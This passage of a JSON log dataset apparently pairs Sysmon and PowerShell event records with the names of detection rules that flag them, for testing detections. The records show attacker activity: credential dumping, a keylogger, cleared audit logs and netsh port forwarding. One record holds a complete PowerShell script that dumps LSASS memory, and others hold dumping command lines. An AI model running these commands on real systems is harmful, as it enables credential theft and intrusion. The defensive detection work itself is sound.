22:09:26.157"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":564596,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.163007Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E1A-6082-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":624,"ProcessGuid":"747F3D96-F41F-6081-0000-001078834A00","ProcessId":6644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-22 22:09:35.263"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564605,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:35.284225Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-09-28 12:47:36.624","Image":"C:\\WINDOWS\\system32\\rdrleakdiag.exe","ProcessGuid":"BC47D85C-DB68-5F71-0000-0010B237AB01","ProcessId":3352,"RuleName":"","TargetFilename":"C:\\Users\\wanwan\\Desktop\\minidump_668.dmp","UtcTime":"2020-09-28 12:47:36.624"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-PIU87N6","Correlation":null,"EventID":11,"EventRecordID":5229,"Execution_attributes":{"ProcessID":2848,"ThreadID":2328},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-09-28T12:47:36.630448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198238040,"Execution_attributes":{"ProcessID":744,"ThreadID":2028},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T09:09:14.916619Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":769792,"Execution_attributes":{"ProcessID":264,"ThreadID":7672},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-17T10:57:37.013214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"KeeFarce.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40","Image":"C:\\Users\\Public\\KeeFarce.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A19B-5CC4-0000-0020A8FF0000","LogonId":"0xffa8","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-A22D-5CC4-0000-0010E2830900","ParentProcessId":3680,"ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"technique_id=T1036,technique_name=Masquerading","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-27 18:47:00.046"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7020,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.046849Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747","Image":"C:\\Users\\Public\\KeeFarce.exe","ImageLoaded":"C:\\Users\\Public\\BootstrapDLL.dll","ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"creddump - keefarce HKTL","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-04-27 18:47:00.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7022,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.062474Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Users\\administrator\\Desktop\\x64\\Outflank-Dumpert.exe","ProcessGuid":"ECAD0485-88C9-5D0C-0000-0010348C1D00","ProcessId":3572,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:37.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238375,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:37.329185Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.258"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238380,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.259077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238383,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.729226Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 07:36:50.985","Image":"C:\\Users\\administrator\\Desktop\\AndrewSpecial.exe","ProcessGuid":"ECAD0485-8912-5D0C-0000-0010FD2F1F00","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\Desktop\\Andrew.dmp","UtcTime":"2019-06-21 07:36:50.985"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238387,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:36:51.681567Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Version","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5589,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Name","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5590,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE4755D1CB0002A410","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Id","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5591,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\MostRecentStart","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5592,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Accessing WinAPI in PowerShell","Malicious PowerShell Keywords","PowerShell Get-Process LSASS in ScriptBlock"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"C:\\Users\\Public\\lsass_wer_ps.ps1","ScriptBlockId":"27f08bda-c330-419f-b83b-eb5c0f699930","ScriptBlockText":"function Memory($path)\r\n{\r\n\t\t\t \r\n\t\t\t \r\n\t\t$Process = Get-Process lsass\r\n\t\t$DumpFilePath = $path\r\n\t\t\r\n\t\t$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\r\n\t\t$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\r\n\t\t$Flags = [Reflection.BindingFlags] 'NonPublic, Static'\r\n\t\t$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\r\n\t\t$MiniDumpWithFullMemory = [UInt32] 2\r\n\t\r\n\t\t\t\r\n\t\t\t #\r\n\t\t$ProcessId = $Process.Id\r\n\t\t$ProcessName = $Process.Name\r\n\t\t$ProcessHandle = $Process.Handle\r\n\t\t$ProcessFileName = \"$($ProcessName).dmp\"\r\n\t\t\r\n\t\t$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName\r\n\t\t\r\n\t\t$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\r\n\t\t\t \r\n\t\t$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$ProcessId,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$FileStream.SafeFileHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$MiniDumpWithFullMemory,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero))\r\n\t\t\t \r\n\t\t$FileStream.Close()\r\n\t\t\r\n\t\tif (-not $Result)\r\n\t\t{\r\n\t\t\t$Exception = New-Object ComponentModel.Win32Exception\r\n\t\t\t$ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\r\n\t\t\t\r\n\t\t\t# Remove any partially written dump files. For example, a partial dump will be written\r\n\t\t\t# in the case when 32-bit PowerShell tries to dump a 64-bit process.\r\n\t\t\tRemove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\r\n\t\t\t\r\n\t\t\tthrow $ExceptionMessage\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\"Memdump complete!\"\r\n\t\t}\r\n\t\r\n}"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"4AA5EAE3-4F33-0001-3A2B-A64A334FD601"},"EventID":4104,"EventRecordID":971,"Execution_attributes":{"ProcessID":7008,"ThreadID":6488},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-06-30T14:24:08.254605Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":104,"EventRecordID":63220,"Execution_attributes":{"ProcessID":264,"ThreadID":644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-308926384-506822093-3341789130-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:31.453647Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"3B","SubjectUserName":"a-jbrown"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"ppldump.exe -p lsass.exe -o a.png","Company":"?","CurrentDirectory":"c:\\Users\\Public\\BYOV\\ZAM64\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC","Image":"C:\\Users\\Public\\BYOV\\ZAM64\\ppldump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-21D2-5E41-0000-002034770900","LogonId":"0x97734","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-27FE-5E41-0000-0010DD653800","ParentProcessId":4236,"ProcessGuid":"747F3D96-2B98-5E41-0000-00109C904700","ProcessId":5016,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 10:08:24.525"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":20012,"Execution_attributes":{"ProcessID":2728,"ThreadID":3456},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T10:08:24.535095Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"chost.exe payload.bin","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\evasion\\","Description":"?","FileVersion":"?","Hashes":"SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25","Image":"C:\\Users\\Public\\tools\\evasion\\chost.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"?","ParentCommandLine":"\"C:\\windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-001025004E3A","ParentProcessId":30572,"ProcessGuid":"00247C92-20BD-5EFE-0000-00106D029D3A","ProcessId":16900,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.612"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116720,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.615842Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Conhost Parent Process Executions"],"event":{"Event":{"EventData":{"CommandLine":"notepad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Notepad","FileVersion":"10.0.18362.693 (WinBuild.160101.0800)","Hashes":"SHA1=C401CD335BA6A3BDAF8799FDC09CDC0721F06015,MD5=06E6C0482562459ADB462CA9008262F8,SHA256=E5D90BEEB6F13F4613C3153DABBD1466F4A062B7252D931F37210907A7F914F7,IMPHASH=E2D17AC7541817AA681AE8FF7734AD89","Image":"C:\\Windows\\System32\\notepad.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"NOTEPAD.EXE","ParentCommandLine":"\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1","ParentImage":"C:\\Windows\\System32\\conhost.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-00105A024E3A","ParentProcessId":29168,"ProcessGuid":"00247C92-20BD-5EFE-0000-00105C059D3A","ProcessId":16788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.642"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116722,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.650400Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"spooler.exe payload.bin","Company":"?","CurrentDirectory":"c:\\Users\\Public\\tools\\cinj\\","Description":"?","FileVersion":"?","Hashes":"SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4","Image":"C:\\Users\\Public\\tools\\cinj\\spooler.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1CE4-5EFE-0000-00208F9C0800","LogonId":"0x89c8f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1E44-5EFE-0000-001096443700","ParentProcessId":1140,"ProcessGuid":"747F3D96-1EA9-5EFE-0000-0010B1F13D00","ProcessId":6892,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-02 17:51:37.815"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":304593,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T17:51:37.819891Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding","Netsh RDP Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"Network Command 